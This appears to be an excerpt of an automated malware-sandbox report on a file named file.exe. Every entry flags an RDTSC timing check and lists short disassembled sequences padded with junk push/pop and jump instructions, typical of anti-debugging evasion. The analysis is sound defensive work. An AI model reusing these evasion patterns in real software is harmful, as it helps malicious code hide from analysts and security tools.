Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D939 second address: 62D977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F6E644F7531h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov edx, ebx 0x00000010 lea eax, dword ptr [ebp+1248C2BDh] 0x00000016 mov edi, dword ptr [ebp+124500DAh] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E644F7533h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E434A second address: 5E434E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663E0B second address: 663E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6640C8 second address: 6640CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6640CF second address: 6640EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6E644F7526h 0x0000000a jmp 00007F6E644F7532h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6640EB second address: 6640EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664365 second address: 66436F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6644DE second address: 6644E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6644E4 second address: 6644EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6647C5 second address: 6647D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6647D4 second address: 6647DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669DF7 second address: 669E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669E14 second address: 669E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669F4C second address: 669F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A1F3 second address: 66A210 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6E644F7533h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A210 second address: 66A217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A217 second address: 66A234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F6E644F7531h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A234 second address: 66A260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 jnp 00007F6E64DC24B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F6E64DC24BFh 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AA64 second address: 66AA78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6E644F752Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AA78 second address: 66AA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AA81 second address: 66AA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66ABD2 second address: 66ABD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E650 second address: 66E656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E656 second address: 66E65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E081 second address: 66E090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E644F7526h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E090 second address: 66E096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E096 second address: 66E09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E09A second address: 66E09E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E09E second address: 66E0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7533h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E0BC second address: 66E0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E1FF second address: 66E21E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F6E644F7526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jng 00007F6E644F7526h 0x00000013 pop edx 0x00000014 pushad 0x00000015 ja 00007F6E644F7526h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E21E second address: 66E230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F6E64DC24B6h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E230 second address: 66E236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E236 second address: 66E23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 675E6B second address: 675E82 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E644F7531h 0x00000008 jmp 00007F6E644F752Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 675E82 second address: 675E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676124 second address: 676147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007F6E644F753Ah 0x0000000b jmp 00007F6E644F7534h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676147 second address: 67614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67614B second address: 67614F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67614F second address: 676155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6765B7 second address: 6765D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F6E644F7526h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jnc 00007F6E644F7526h 0x00000011 ja 00007F6E644F7526h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6765D0 second address: 6765DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6765DD second address: 6765E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6765E3 second address: 6765E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676871 second address: 67689E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Bh 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F6E644F7535h 0x00000010 jo 00007F6E644F7526h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6772C9 second address: 6772EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6E64DC24B6h 0x0000000a jmp 00007F6E64DC24C7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6772EA second address: 6772EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6772EE second address: 677305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 jbe 00007F6E64DC24B6h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 677305 second address: 67731F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67731F second address: 677329 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7B6 second address: 67A7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E644F752Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7C7 second address: 67A7CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7CC second address: 67A7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7D2 second address: 67A7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E64DC24C1h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A7EE second address: 67A7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A967 second address: 67A96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67B055 second address: 67B05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EBF1 second address: 67EBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EBF5 second address: 67EC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EC11 second address: 67EC28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EC28 second address: 67EC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ED9B second address: 67EDA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EDA5 second address: 67EDA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F04F second address: 67F05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6E64DC24B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F05A second address: 67F07F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E644F7539h 0x00000008 jmp 00007F6E644F7533h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F07F second address: 67F083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F083 second address: 67F09D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7536h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F09D second address: 67F0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F0A3 second address: 67F0B2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EAD1B second address: 5EAD2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6860EE second address: 6860F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6860F2 second address: 6860FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686273 second address: 686280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686568 second address: 68656E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686851 second address: 686861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F6E644F752Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686861 second address: 686873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F6E64DC24C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686873 second address: 686880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6E644F7526h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686880 second address: 686885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686DB4 second address: 686DBC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686DBC second address: 686DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F6E64DC24B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686DC8 second address: 686DEA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E644F7526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jc 00007F6E644F7526h 0x00000013 jnp 00007F6E644F7526h 0x00000019 pop ebx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686DEA second address: 686E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686E04 second address: 686E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687638 second address: 68763C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C8CC second address: 68C8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C8D0 second address: 68C8FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007F6E64DC24BCh 0x0000000e jmp 00007F6E64DC24C8h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C8FF second address: 68C905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C905 second address: 68C914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007F6E64DC24B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C914 second address: 68C918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68BFB4 second address: 68BFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68BFB8 second address: 68BFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C104 second address: 68C10E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C10E second address: 68C112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C2A3 second address: 68C2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C533 second address: 68C537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C537 second address: 68C56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F6E64DC24C9h 0x00000014 push esi 0x00000015 jnl 00007F6E64DC24B6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C56D second address: 68C572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C572 second address: 68C58E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pushad 0x00000008 je 00007F6E64DC24B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699A7D second address: 699A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699A87 second address: 699A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F6E64DC24B8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699A9D second address: 699ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F6E644F7526h 0x0000000b jmp 00007F6E644F7530h 0x00000010 popad 0x00000011 jo 00007F6E644F7536h 0x00000017 jmp 00007F6E644F752Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699ACB second address: 699AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6E64DC24BDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699AE0 second address: 699B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E644F7538h 0x0000000e ja 00007F6E644F7526h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 697BE8 second address: 697BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69827E second address: 698282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
